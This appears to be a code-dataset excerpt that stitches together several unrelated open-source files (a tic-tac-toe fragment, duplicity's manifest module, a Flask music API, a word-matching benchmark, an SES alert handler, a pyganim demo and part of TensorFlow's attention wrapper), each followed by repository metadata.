if(doska[int(n2)]=="-"):
doska[int(n2)]="O"
disp(doska)
bol=True
wins=win(doska)
else:
print("Занято")
if(wins and bol):
print("Победил игрок 2")
elif(wins and not bol):
print("Победил игрок 1")
else:
print("Ничья")
input("Ok") | apache-2.0 | 7,851,925,064,230,096,000 | 25.137931 | 76 | 0.446205 | false |
muff1nman/duplicity | duplicity/manifest.py | 1 | 16791 | # -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright 2002 Ben Escoto <[email protected]>
# Copyright 2007 Kenneth Loafman <[email protected]>
#
# This file is part of duplicity.
#
# Duplicity is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation; either version 2 of the License, or (at your
# option) any later version.
#
# Duplicity is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with duplicity; if not, write to the Free Software Foundation,
# Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""Create and edit manifest for session contents"""
from future_builtins import filter
import re
from duplicity import log
from duplicity import globals
from duplicity import util
class ManifestError(Exception):
"""
Exception raised when problem with manifest
"""
pass
class Manifest:
"""
List of volumes and information about each one
"""
def __init__(self, fh=None):
"""
Create blank Manifest
@param fh: fileobj for manifest
@type fh: DupPath
@rtype: Manifest
@return: manifest
"""
self.hostname = None
self.local_dirname = None
self.volume_info_dict = {} # dictionary vol numbers -> vol infos
self.fh = fh
self.files_changed = []
def set_dirinfo(self):
"""
Set information about directory from globals,
and write to manifest file.
@rtype: Manifest
@return: manifest
"""
self.hostname = globals.hostname
self.local_dirname = globals.local_path.name # @UndefinedVariable
if self.fh:
if self.hostname:
self.fh.write("Hostname %s\n" % self.hostname)
if self.local_dirname:
self.fh.write("Localdir %s\n" % Quote(self.local_dirname))
return self
def check_dirinfo(self):
"""
Return None if dirinfo is the same, otherwise error message
Does not raise an error message if hostname or local_dirname
are not available.
@rtype: string
@return: None or error message
"""
if globals.allow_source_mismatch:
return
if self.hostname and self.hostname != globals.hostname:
errmsg = _("Fatal Error: Backup source host has changed.\n"
"Current hostname: %s\n"
"Previous hostname: %s") % (globals.hostname, self.hostname)
code = log.ErrorCode.hostname_mismatch
code_extra = "%s %s" % (util.escape(globals.hostname), util.escape(self.hostname))
elif (self.local_dirname and self.local_dirname != globals.local_path.name): # @UndefinedVariable
errmsg = _("Fatal Error: Backup source directory has changed.\n"
"Current directory: %s\n"
"Previous directory: %s") % (globals.local_path.name, self.local_dirname) # @UndefinedVariable
code = log.ErrorCode.source_dir_mismatch
code_extra = "%s %s" % (util.escape(globals.local_path.name), util.escape(self.local_dirname)) # @UndefinedVariable
else:
return
log.FatalError(errmsg + "\n\n" +
_("Aborting because you may have accidentally tried to "
"backup two different data sets to the same remote "
"location, or using the same archive directory. If "
"this is not a mistake, use the "
"--allow-source-mismatch switch to avoid seeing this "
"message"), code, code_extra)
def set_files_changed_info(self, files_changed):
if files_changed:
self.files_changed = files_changed
if self.fh:
self.fh.write("Filelist %d\n" % len(self.files_changed))
for fileinfo in self.files_changed:
self.fh.write(" %-7s %s\n" % (fileinfo[1], Quote(fileinfo[0])))
def add_volume_info(self, vi):
"""
Add volume info vi to manifest and write to manifest
@param vi: volume info to add
@type vi: VolumeInfo
@return: void
"""
vol_num = vi.volume_number
self.volume_info_dict[vol_num] = vi
if self.fh:
self.fh.write(vi.to_string() + "\n")
def del_volume_info(self, vol_num):
"""
Remove volume vol_num from the manifest
@param vol_num: volume number to delete
@type vi: int
@return: void
"""
try:
del self.volume_info_dict[vol_num]
except Exception:
raise ManifestError("Volume %d not present in manifest" % (vol_num,))
def to_string(self):
"""
Return string version of self (just concatenate vi strings)
@rtype: string
@return: self in string form
"""
result = ""
if self.hostname:
result += "Hostname %s\n" % self.hostname
if self.local_dirname:
result += "Localdir %s\n" % Quote(self.local_dirname)
result += "Filelist %d\n" % len(self.files_changed)
for fileinfo in self.files_changed:
result += " %-7s %s\n" % (fileinfo[1], Quote(fileinfo[0]))
vol_num_list = self.volume_info_dict.keys()
vol_num_list.sort()
def vol_num_to_string(vol_num):
return self.volume_info_dict[vol_num].to_string()
result = "%s%s\n" % (result,
"\n".join(map(vol_num_to_string, vol_num_list)))
return result
__str__ = to_string
def from_string(self, s):
"""
Initialize self from string s, return self
"""
def get_field(fieldname):
"""
Return the value of a field by parsing s, or None if no field
"""
m = re.search("(^|\\n)%s\\s(.*?)\n" % fieldname, s, re.I)
if not m:
return None
else:
return Unquote(m.group(2))
self.hostname = get_field("hostname")
self.local_dirname = get_field("localdir")
# Get file changed list
filelist_regexp = re.compile("(^|\\n)filelist\\s([0-9]+)\\n(.*?)(\\nvolume\\s|$)", re.I | re.S)
match = filelist_regexp.search(s)
filecount = 0
if match:
filecount = int(match.group(2))
if filecount > 0:
def parse_fileinfo(line):
fileinfo = line.strip().split()
return (fileinfo[0], ''.join(fileinfo[1:]))
self.files_changed = list(map(parse_fileinfo, match.group(3).split('\n')))
assert filecount == len(self.files_changed)
next_vi_string_regexp = re.compile("(^|\\n)(volume\\s.*?)"
"(\\nvolume\\s|$)", re.I | re.S)
starting_s_index = 0
highest_vol = 0
latest_vol = 0
while 1:
match = next_vi_string_regexp.search(s[starting_s_index:])
if not match:
break
vi = VolumeInfo().from_string(match.group(2))
self.add_volume_info(vi)
highest_vol = max(highest_vol, vi.volume_number)
latest_vol = vi.volume_number
starting_s_index += match.end(2)
# If we restarted after losing some remote volumes, the highest volume
# seen may be higher than the last volume recorded. That is, the
# manifest could contain "vol1, vol2, vol3, vol2." If so, we don't
# want to keep vol3's info.
for i in range(latest_vol + 1, highest_vol + 1):
self.del_volume_info(i)
return self
def get_files_changed(self):
return self.files_changed
def __eq__(self, other):
"""
Two manifests are equal if they contain the same volume infos
"""
vi_list1 = self.volume_info_dict.keys()
vi_list1.sort()
vi_list2 = other.volume_info_dict.keys()
vi_list2.sort()
if vi_list1 != vi_list2:
log.Notice(_("Manifests not equal because different volume numbers"))
return False
for i in range(len(vi_list1)):
if not vi_list1[i] == vi_list2[i]:
log.Notice(_("Manifests not equal because volume lists differ"))
return False
if (self.hostname != other.hostname or
self.local_dirname != other.local_dirname):
log.Notice(_("Manifests not equal because hosts or directories differ"))
return False
return True
def __ne__(self, other):
"""
Defines !=. Not doing this always leads to annoying bugs...
"""
return not self.__eq__(other)
def write_to_path(self, path):
"""
Write string version of manifest to given path
"""
assert not path.exists()
fout = path.open("wb")
fout.write(self.to_string())
assert not fout.close()
path.setdata()
def get_containing_volumes(self, index_prefix):
"""
Return list of volume numbers that may contain index_prefix
"""
return filter(lambda vol_num:
self.volume_info_dict[vol_num].contains(index_prefix),
self.volume_info_dict.keys())
class VolumeInfoError(Exception):
"""
Raised when there is a problem initializing a VolumeInfo from string
"""
pass
class VolumeInfo:
"""
Information about a single volume
"""
def __init__(self):
"""VolumeInfo initializer"""
self.volume_number = None
self.start_index = None
self.start_block = None
self.end_index = None
self.end_block = None
self.hashes = {}
def set_info(self, vol_number,
start_index, start_block,
end_index, end_block):
"""
Set essential VolumeInfo information, return self
Call with starting and ending paths stored in the volume. If
a multivol diff gets split between volumes, count it as being
part of both volumes.
"""
self.volume_number = vol_number
self.start_index = start_index
self.start_block = start_block
self.end_index = end_index
self.end_block = end_block
return self
def set_hash(self, hash_name, data):
"""
Set the value of hash hash_name (e.g. "MD5") to data
"""
self.hashes[hash_name] = data
def get_best_hash(self):
"""
Return pair (hash_type, hash_data)
SHA1 is the best hash, and MD5 is the second best hash. None
is returned if no hash is available.
"""
if not self.hashes:
return None
try:
return ("SHA1", self.hashes['SHA1'])
except KeyError:
pass
try:
return ("MD5", self.hashes['MD5'])
except KeyError:
pass
return self.hashes.items()[0]
def to_string(self):
"""
Return nicely formatted string reporting all information
"""
def index_to_string(index):
"""Return printable version of index without any whitespace"""
if index:
s = "/".join(index)
return Quote(s)
else:
return "."
slist = ["Volume %d:" % self.volume_number]
whitespace = " "
slist.append("%sStartingPath %s %s" %
(whitespace, index_to_string(self.start_index), (self.start_block or " ")))
slist.append("%sEndingPath %s %s" %
(whitespace, index_to_string(self.end_index), (self.end_block or " ")))
for key in self.hashes:
slist.append("%sHash %s %s" %
(whitespace, key, self.hashes[key]))
return "\n".join(slist)
__str__ = to_string
def from_string(self, s):
"""
Initialize self from string s as created by to_string
"""
def string_to_index(s):
"""
Return tuple index from string
"""
s = Unquote(s)
if s == ".":
return ()
return tuple(s.split("/"))
linelist = s.strip().split("\n")
# Set volume number
m = re.search("^Volume ([0-9]+):", linelist[0], re.I)
if not m:
raise VolumeInfoError("Bad first line '%s'" % (linelist[0],))
self.volume_number = int(m.group(1))
# Set other fields
for line in linelist[1:]:
if not line:
continue
line_split = line.strip().split()
field_name = line_split[0].lower()
other_fields = line_split[1:]
if field_name == "Volume":
log.Warn(_("Warning, found extra Volume identifier"))
break
elif field_name == "startingpath":
self.start_index = string_to_index(other_fields[0])
if len(other_fields) > 1:
self.start_block = int(other_fields[1])
else:
self.start_block = None
elif field_name == "endingpath":
self.end_index = string_to_index(other_fields[0])
if len(other_fields) > 1:
self.end_block = int(other_fields[1])
else:
self.end_block = None
elif field_name == "hash":
self.set_hash(other_fields[0], other_fields[1])
if self.start_index is None or self.end_index is None:
raise VolumeInfoError("Start or end index not set")
return self
def __eq__(self, other):
"""
Used in test suite
"""
if not isinstance(other, VolumeInfo):
log.Notice(_("Other is not VolumeInfo"))
return None
if self.volume_number != other.volume_number:
log.Notice(_("Volume numbers don't match"))
return None
if self.start_index != other.start_index:
log.Notice(_("start_indicies don't match"))
return None
if self.end_index != other.end_index:
log.Notice(_("end_index don't match"))
return None
hash_list1 = self.hashes.items()
hash_list1.sort()
hash_list2 = other.hashes.items()
hash_list2.sort()
if hash_list1 != hash_list2:
log.Notice(_("Hashes don't match"))
return None
return 1
def __ne__(self, other):
"""
Defines !=
"""
return not self.__eq__(other)
def contains(self, index_prefix, recursive=1):
"""
Return true if volume might contain index
If recursive is true, then return true if any index starting
with index_prefix could be contained. Otherwise, just check
if index_prefix itself is between starting and ending
indicies.
"""
if recursive:
return (self.start_index[:len(index_prefix)] <=
index_prefix <= self.end_index)
else:
return self.start_index <= index_prefix <= self.end_index
nonnormal_char_re = re.compile("(\\s|[\\\\\"'])")
def Quote(s):
"""
Return quoted version of s safe to put in a manifest or volume info
"""
if not nonnormal_char_re.search(s):
return s # no quoting necessary
slist = []
for char in s:
if nonnormal_char_re.search(char):
slist.append("\\x%02x" % ord(char))
else:
slist.append(char)
return '"%s"' % "".join(slist)
def Unquote(quoted_string):
"""
Return original string from quoted_string produced by above
"""
if not quoted_string[0] == '"' or quoted_string[0] == "'":
return quoted_string
assert quoted_string[0] == quoted_string[-1]
return_list = []
i = 1 # skip initial char
while i < len(quoted_string) - 1:
char = quoted_string[i]
if char == "\\":
# quoted section
assert quoted_string[i + 1] == "x"
return_list.append(chr(int(quoted_string[i + 2:i + 4], 16)))
i += 4
else:
return_list.append(char)
i += 1
return "".join(return_list)
| gpl-2.0 | -1,987,972,922,932,362,800 | 32.183794 | 128 | 0.546602 | false |
karpeev/libmesh | doc/statistics/libmesh_citations.py | 1 | 2340 | #!/usr/bin/env python
import matplotlib.pyplot as plt
import numpy as np
# Number of "papers using libmesh" by year.
#
# Note 1: this does not count citations "only," the authors must have actually
# used libmesh in part of their work. Therefore, these counts do not include
# things like Wolfgang citing us in his papers to show how Deal.II is
# superior...
#
# Note 2: I typically update this data after regenerating the web page,
# since bibtex2html renumbers the references starting from "1" each year.
#
# Note 3: These citations include anything that is not a dissertation/thesis.
# So, some are conference papers, some are journal articles, etc.
#
# Note 4: The libmesh paper came out in 2006, but there are some citations
# prior to that date, obviously. These counts include citations of the
# website libmesh.sf.net as well...
#
# Note 5: Preprints are listed as the "current year + 1" and are constantly
# being moved to their respective years after being published.
data = [
'2004', 5,
'\'05', 2,
'\'06', 13,
'\'07', 8,
'\'08', 23,
'\'09', 30,
'\'10', 24,
'\'11', 37,
'\'12', 50,
'\'13', 78,
'\'14', 62,
'\'15', 24,
'P', 5, # Preprints
'T', 38 # Theses
]
# Extract the x-axis labels from the data array
xlabels = data[0::2]
# Extract the publication counts from the data array
n_papers = data[1::2]
# The number of data points
N = len(xlabels);
# Get a reference to the figure
fig = plt.figure()
# 111 is equivalent to Matlab's subplot(1,1,1) command
ax = fig.add_subplot(111)
# Create an x-axis for plotting
x = np.linspace(1, N, N)
# Width of the bars
width = 0.8
# Make the bar chart. Plot years in blue, preprints and theses in green.
ax.bar(x[0:N-2], n_papers[0:N-2], width, color='b')
ax.bar(x[N-2:N], n_papers[N-2:N], width, color='g')
# Label the x-axis
plt.xlabel('P=Preprints, T=Theses')
# Set up the xtick locations and labels. Note that you have to offset
# the position of the ticks by width/2, where width is the width of
# the bars.
ax.set_xticks(np.linspace(1,N,N) + width/2)
ax.set_xticklabels(xlabels)
# Create a title string
title_string = 'LibMesh Citations, (' + str(sum(n_papers)) + ' Total)'
fig.suptitle(title_string)
# Save as PDF
plt.savefig('libmesh_citations.pdf')
# Local Variables:
# python-indent: 2
# End:
| lgpl-2.1 | -5,032,296,851,778,894,000 | 26.529412 | 78 | 0.674359 | false |
meisterluk/print-nonascii.py | printnonascii/char.py | 1 | 2308 | #!/usr/bin/env python3
class Character:
def __init__(self, c):
self.character = c
self.unicode_point = None
self.lineno = None
self.colno = None
self.category = None
self.description = None
self.line = None
def asciionly(self):
assert self.description or self.unicode_point
if self.description is not None and self.unicode_point is not None:
out = '{} {}'.format(self.unicode_point, self.description)
elif self.description:
out = '{}'.format(self.description)
elif self.unicode_point is not None:
out = '{}'.format(self.unicode_point)
if self.category is not None:
out += ' of category {}'.format(self.category)
if self.lineno is not None:
out += ' at line {}'.format(self.lineno)
elif self.colno is not None:
out += ' at column {}'.format(self.colno)
return out
@staticmethod
def make_pointer(line, colno):
out = ''
for idx in range(len(line)):
if idx == colno:
break
elif line[idx] == '\t':
out += '\t'
else:
out += '─'
return out + '⬏'
def __str__(self):
out = ''
if self.line is not None and self.colno is not None:
leading_ws = max(len(str(self.lineno)), 3)
tmpl = '{: <' + str(leading_ws) + 'd}: {}'
out += tmpl.format(self.lineno, self.line)
out += ' ' * leading_ws + ': '
out += self.make_pointer(self.line, self.colno)
out += '\n\n'
out += "{} ".format(self.character)
if self.unicode_point:
out += '{} '.format(self.unicode_point)
if self.lineno is not None and self.colno is not None:
out += '(line {}, col {})'.format(self.lineno, self.colno)
elif self.lineno is not None:
out += '(line {})'.format(self.lineno)
elif self.colno is not None:
out += '(col {})'.format(self.colno)
out += "\n"
if self.category:
out += " category: {}\n".format(self.category)
out += " name: {}\n".format(self.description)
out += "\n"
return out
| bsd-3-clause | -7,909,865,003,349,707,000 | 30.135135 | 75 | 0.503906 | false |
building4theweb/soundem-api | soundem/views.py | 1 | 5875 | from flask import g, jsonify, request, abort
from flask_cors import cross_origin
from soundem import app
from .decorators import auth_token_required
from .models import Artist, Album, Song, User
@app.route('/api/v1/login', methods=['POST'])
@cross_origin(headers=['Content-Type', 'Authorization'])
def login():
data = request.get_json() or {}
email = data.get('email')
password = data.get('password')
errors = {}
if not email:
errors['email'] = 'Field is required.'
if not password:
errors['password'] = 'Field is required.'
user = User.find_by_email(email)
if not user:
errors['email'] = 'User does not exist.'
elif not user.check_password(password):
errors['password'] = 'Invalid password.'
if errors:
return jsonify({'errors': errors}), 400
user_data = {
'id': user.id,
'email': user.email,
'token': user.get_auth_token()
}
return jsonify({'user': user_data})
@app.route('/api/v1/register', methods=['POST'])
@cross_origin(headers=['Content-Type', 'Authorization'])
def register():
data = request.get_json() or {}
email = data.get('email')
password = data.get('password')
errors = {}
if not email:
errors['email'] = 'Field is required.'
if not password:
errors['password'] = 'Field is required.'
existing_user = User.find_by_email(email)
if existing_user:
errors['email'] = 'Email is already taken'
if errors:
return jsonify({'errors': errors}), 400
user = User.create(email=email, password=password)
user_data = {
'id': user.id,
'email': user.email,
'token': user.get_auth_token()
}
return jsonify({'user': user_data}), 201
@app.route('/api/v1/artists', methods=['GET'])
@cross_origin(headers=['Content-Type', 'Authorization'])
@auth_token_required
def get_artists():
artists_results = []
for artist in Artist.get_all():
artists_results.append({
'id': artist.id,
'name': artist.name,
'bio': artist.bio,
'albums': [album.id for album in artist.albums.all()]
})
return jsonify({'artists': artists_results})
@app.route('/api/v1/artists/<int:artist_id>', methods=['GET'])
@cross_origin(headers=['Content-Type', 'Authorization'])
@auth_token_required
def get_artist(artist_id):
artist = Artist.get(artist_id)
if not artist:
abort(404)
artist_data = {
'id': artist.id,
'name': artist.name,
'bio': artist.bio,
'albums': [album.id for album in artist.albums.all()]
}
return jsonify({'artist': artist_data})
@app.route('/api/v1/albums', methods=['GET'])
@cross_origin(headers=['Content-Type', 'Authorization'])
@auth_token_required
def get_albums():
albums_results = []
for album in Album.get_all():
albums_results.append({
'id': album.id,
'name': album.name,
'artworkURL': album.artwork_url,
'artist': album.artist_id,
'songs': [song.id for song in album.songs.all()]
})
return jsonify({'albums': albums_results})
@app.route('/api/v1/albums/<int:album_id>', methods=['GET'])
@cross_origin(headers=['Content-Type', 'Authorization'])
@auth_token_required
def get_album(album_id):
album = Album.get(album_id)
if not album:
abort(404)
album_data = {
'id': album.id,
'name': album.name,
'artworkURL': album.artwork_url,
'artist': album.artist_id,
'songs': [song.id for song in album.songs.all()]
}
return jsonify({'album': album_data})
@app.route('/api/v1/songs', methods=['GET'])
@cross_origin(headers=['Content-Type', 'Authorization'])
@auth_token_required
def get_songs():
songs_results = []
favorite = request.args.get('favorite')
song_ids = request.args.getlist('ids[]')
if favorite == 'true':
songs = Song.get_favorites(g.user)
elif song_ids:
songs = Song.filter_by_ids(song_ids)
else:
songs = Song.get_all()
for song in songs:
songs_results.append({
'id': song.id,
'name': song.name,
'album': song.album.id,
'favorite': song.is_favorited(g.user),
'duration': song.duration,
'url': song.url
})
return jsonify({'songs': songs_results})
@app.route('/api/v1/songs/<int:song_id>', methods=['GET', 'PUT'])
@cross_origin(headers=['Content-Type', 'Authorization'])
@auth_token_required
def song(song_id):
song = Song.get(song_id)
is_favorited = None
if not song:
abort(404)
if request.method == 'PUT':
data = request.get_json() or {}
data_song = data.get('song') or {}
favorite = data_song.get('favorite')
if favorite is not None:
# Update song if favorite param was sent
is_favorited = song.set_favorite(g.user, favorite)
else:
song = Song.get(song_id)
if is_favorited is None:
# Check if song was favorited
is_favorited = song.is_favorited(g.user)
song_data = {
'id': song.id,
'name': song.name,
'album': song.album.id,
'favorite': is_favorited,
'duration': song.duration,
'url': song.url
}
return jsonify({'song': song_data})
@app.route('/api/v1/users/<int:user_id>', methods=['GET'])
@cross_origin(headers=['Content-Type', 'Authorization'])
@auth_token_required
def user(user_id):
user = g.user
if user.id != user_id:
abort(403)
user_data = {
'id': user.id,
'email': user.email,
'songTotal': Song.total_count(),
'albumTotal': Album.total_count(),
'durationTotal': Song.total_duration()
}
return jsonify({'user': user_data})
| mit | 6,891,862,848,539,757,000 | 24.323276 | 65 | 0.584 | false |
notkarol/banjin | experiment/python_word_matching_speed.py | 1 | 4650 | #!/usr/bin/python
# Takes in a dictionary of words
# Verifies that all functions return the same answers
# Generates random hands from the probability of getting tiles from the bunch
# Then prints out how long each function takes to find all matching words
# Generates various hand sizes to see if there's any scaling
import matplotlib.pyplot as plt
import numpy as np
import pickle
import os
import sys
import timeit
# Naive list way of matching wordbank
def f0_list(hand, wordbank):
results = []
for w_i in range(len(wordbank)):
match = True
for i in range(26):
if hand[i] < wordbank[w_i][i]:
match = False
break
if match:
results.append(w_i)
return results
# A for loop and some numpy
def f1_list(hand, wordbank):
results = []
for w_i in range(len(wordbank)):
if min(list(map(lambda x: x[1] - x[0], zip(wordbank[w_i], hand)))) >= 0:
results.append(w_i)
return results
# Naive way using numpy
def f0_np(hand, wordbank):
results = []
for w_i in range(len(wordbank)):
match = True
for i in range(26):
if hand[i] < wordbank[w_i,i]:
match = False
break
if match:
results.append(w_i)
return results
# A for loop and some numpy
def f1_np(hand, wordbank):
results = []
for w_i in range(len(wordbank)):
if not np.any((hand - wordbank[w_i]) < 0):
results.append(w_i)
return results
# A for loop and some numpy
def f2_np(hand, wordbank):
results = []
for w_i in range(len(wordbank)):
if np.min(hand - wordbank[w_i]) >= 0:
results.append(w_i)
return results
# Vectorized sum and difference
def f3_np(hand, wordbank):
return np.where(np.sum((wordbank - hand) > 0, axis=1) == 0)[0]
# vectorized just using any
def f4_np(hand, wordbank):
return np.where(np.any(wordbank > hand, axis=1) == 0)[0]
# Prepare a 2D list and a 2D np array of letter frequencies
with open(sys.argv[1]) as f:
words = [x.split()[0] for x in f.readlines()]
wordbank_list = [[0] * 26 for _ in range(len(words))]
wordbank_np = np.zeros((len(words), 26))
for w_i in range(len(words)):
for letter in sorted(words[w_i]):
pos = ord(letter) - 65
wordbank_list[w_i][pos] += 1
wordbank_np[w_i][pos] += 1
# Arrays for keeping track of functions and data-specific wordbanks
hand_sizes = list(range(2, 9))
functions = {'list' : [f0_list, f1_list],
'numpy': [f0_np, f1_np, f2_np, f3_np, f4_np]}
wordbanks = {'list' : wordbank_list,
'numpy': wordbank_np}
n_iter = 10 if len(sys.argv) < 3 else int(sys.argv[2])
timings = {}
for datatype in functions:
timings[datatype] = np.zeros((max(hand_sizes) + 1, n_iter, len(functions[datatype])))
# Verify that our functions give the same answers
for datatype in functions:
for func in functions[datatype]:
print(datatype, func(wordbanks[datatype][len(wordbank_list) // 2], wordbanks[datatype]))
# Time each word
imports = 'from __main__ import functions, wordbanks'
for counter in range(n_iter):
for hand_size in hand_sizes:
# Get a specific hand size
hand = [13,3,3,6,18,3,4,3,12,2,2,5,3,8,11,3,2,9,6,9,6,3,3,2,3,2]
while sum(hand) > hand_size:
pos = np.random.randint(sum(hand))
for i in range(len(hand)):
pos -= hand[i]
if pos < 0:
hand[i] -= 1
break
hand = str(hand)
# For this hand go wild
for datatype in functions:
for f_i in range(len(functions[datatype])):
cmd = 'functions["%s"][%i](%s, wordbanks["%s"])' % (datatype, f_i, hand, datatype)
timings[datatype][hand_size, counter, f_i] += timeit.timeit(cmd, imports, number=8)
print("\rCompleted %.1f%%" % (100 * (counter + 1) / n_iter), end='')
print()
# Save words and timings in case we're doing a long-lasting operation
filename = 'word_matching_timings_%s.pkl' % os.path.basename(sys.argv[1])
with open(filename, 'wb') as f:
print("Saving", filename)
pickle.dump((words, wordbanks, timings), f)
# Show Results
for datatype in functions:
means = np.mean(timings[datatype], axis=1)
for f_i in range(means.shape[1]):
plt.semilogy(hand_sizes, means[:, f_i][min(hand_sizes):], label='%s F%i' % (datatype, f_i))
plt.legend(loc='center left', bbox_to_anchor=(0.85, 0.5))
plt.xlabel("Hand Size")
plt.ylabel("Execution Time")
plt.title("Word Matching")
plt.show()
| mit | 6,223,729,968,353,600,000 | 29.794702 | 99 | 0.60043 | false |
cloudtools/nymms | nymms/reactor/handlers/ses_handler.py | 1 | 1939 | import logging
from nymms.reactor.handlers.Handler import Handler
from nymms.utils.aws_helper import ConnectionManager
from jinja2 import Template
from nymms.utils.templates import SimpleUndefined
logger = logging.getLogger(__name__)
class SESHandler(Handler):
""" A basic handler to send alerts to people via email through Amazon's
SES service. Sends every result it receives by default. To filter
results you should subclass this and provide a _filter method.
config options:
enabled: bool
region: string, aws region (us-east-1, etc)
sender: string, email address
subject_template: string
body_template: string
recipients: list, email addresses
filters: list, filters
"""
@property
def aws_conn(self):
if not getattr(self, '_aws_conn', None):
self._aws_conn = ConnectionManager(region=self.config['region'])
return self._aws_conn
def _send_email(self, result, previous_state):
subject = Template(self.config['subject_template'])
subject.environment.undefined = SimpleUndefined
body = Template(self.config['body_template'])
body.environment.undefined = SimpleUndefined
sender = self.config['sender']
recipients = self.config.get('recipients', [])
result_data = result.serialize()
if recipients:
logger.debug("Sending SES alert to %s as %s for %s.",
recipients, sender, result.id)
self.aws_conn.ses.send_email(
source=sender,
subject=subject.render(result_data),
body=body.render(result_data),
to_addresses=recipients)
else:
logger.debug("No valid recipients found, not sending email for "
"%s.", result.id)
def _process(self, result, previous_state):
self._send_email(result, previous_state)
| bsd-2-clause | -822,869,434,789,663,400 | 35.584906 | 76 | 0.638989 | false |
asweigart/pyganim | examples/sprite_sheet_demo.py | 1 | 1276 | # trex image from Wyverii on http://opengameart.org/content/unsealed-terrex
import sys
import os
sys.path.append(os.path.abspath('..'))
import pygame
from pygame.locals import *
import pyganim
pygame.init()
# set up the window
windowSurface = pygame.display.set_mode((320, 240), 0, 32)
pygame.display.set_caption('Sprite Sheet Demo')
# create the animation objects
rects = [( 0, 154, 94, 77),
( 94, 154, 94, 77),
(188, 154, 94, 77),
(282, 154, 94, 77),
(376, 154, 94, 77),
(470, 154, 94, 77),
(564, 154, 94, 77),
(658, 154, 94, 77),
(752, 154, 94, 77),]
allImages = pyganim.getImagesFromSpriteSheet('terrex_0.png', rects=rects)
frames = list(zip(allImages, [100] * len(allImages)))
dinoAnim = pyganim.PygAnimation(frames)
dinoAnim.play() # there is also a pause() and stop() method
mainClock = pygame.time.Clock()
BGCOLOR = (100, 50, 50)
while True:
windowSurface.fill(BGCOLOR)
for event in pygame.event.get():
if event.type == QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE):
pygame.quit()
sys.exit()
dinoAnim.blit(windowSurface, (100, 50))
pygame.display.update()
mainClock.tick(30) # Feel free to experiment with any FPS setting. | bsd-3-clause | -1,025,960,563,565,159,800 | 27.377778 | 83 | 0.633229 | false |
Xeralux/tensorflow | tensorflow/contrib/seq2seq/python/ops/attention_wrapper.py | 1 | 59833 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A powerful dynamic attention wrapper object."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import functools
import math
import numpy as np
from tensorflow.contrib.framework.python.framework import tensor_util
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.layers import base as layers_base
from tensorflow.python.layers import core as layers_core
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import clip_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import rnn_cell_impl
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.util import nest
__all__ = [
"AttentionMechanism",
"AttentionWrapper",
"AttentionWrapperState",
"LuongAttention",
"BahdanauAttention",
"hardmax",
"safe_cumprod",
"monotonic_attention",
"BahdanauMonotonicAttention",
"LuongMonotonicAttention",
]
_zero_state_tensors = rnn_cell_impl._zero_state_tensors # pylint: disable=protected-access
class AttentionMechanism(object):
@property
def alignments_size(self):
raise NotImplementedError
@property
def state_size(self):
raise NotImplementedError
def _prepare_memory(memory, memory_sequence_length, check_inner_dims_defined):
"""Convert to tensor and possibly mask `memory`.
Args:
memory: `Tensor`, shaped `[batch_size, max_time, ...]`.
memory_sequence_length: `int32` `Tensor`, shaped `[batch_size]`.
check_inner_dims_defined: Python boolean. If `True`, the `memory`
argument's shape is checked to ensure all but the two outermost
dimensions are fully defined.
Returns:
A (possibly masked), checked, new `memory`.
Raises:
ValueError: If `check_inner_dims_defined` is `True` and not
`memory.shape[2:].is_fully_defined()`.
"""
memory = nest.map_structure(
lambda m: ops.convert_to_tensor(m, name="memory"), memory)
if memory_sequence_length is not None:
memory_sequence_length = ops.convert_to_tensor(
memory_sequence_length, name="memory_sequence_length")
if check_inner_dims_defined:
def _check_dims(m):
if not m.get_shape()[2:].is_fully_defined():
raise ValueError("Expected memory %s to have fully defined inner dims, "
"but saw shape: %s" % (m.name, m.get_shape()))
nest.map_structure(_check_dims, memory)
if memory_sequence_length is None:
seq_len_mask = None
else:
seq_len_mask = array_ops.sequence_mask(
memory_sequence_length,
maxlen=array_ops.shape(nest.flatten(memory)[0])[1],
dtype=nest.flatten(memory)[0].dtype)
seq_len_batch_size = (
memory_sequence_length.shape[0].value
or array_ops.shape(memory_sequence_length)[0])
def _maybe_mask(m, seq_len_mask):
rank = m.get_shape().ndims
rank = rank if rank is not None else array_ops.rank(m)
extra_ones = array_ops.ones(rank - 2, dtype=dtypes.int32)
m_batch_size = m.shape[0].value or array_ops.shape(m)[0]
if memory_sequence_length is not None:
message = ("memory_sequence_length and memory tensor batch sizes do not "
"match.")
with ops.control_dependencies([
check_ops.assert_equal(
seq_len_batch_size, m_batch_size, message=message)]):
seq_len_mask = array_ops.reshape(
seq_len_mask,
array_ops.concat((array_ops.shape(seq_len_mask), extra_ones), 0))
return m * seq_len_mask
else:
return m
return nest.map_structure(lambda m: _maybe_mask(m, seq_len_mask), memory)
def _maybe_mask_score(score, memory_sequence_length, score_mask_value):
if memory_sequence_length is None:
return score
message = ("All values in memory_sequence_length must greater than zero.")
with ops.control_dependencies(
[check_ops.assert_positive(memory_sequence_length, message=message)]):
score_mask = array_ops.sequence_mask(
memory_sequence_length, maxlen=array_ops.shape(score)[1])
score_mask_values = score_mask_value * array_ops.ones_like(score)
return array_ops.where(score_mask, score, score_mask_values)
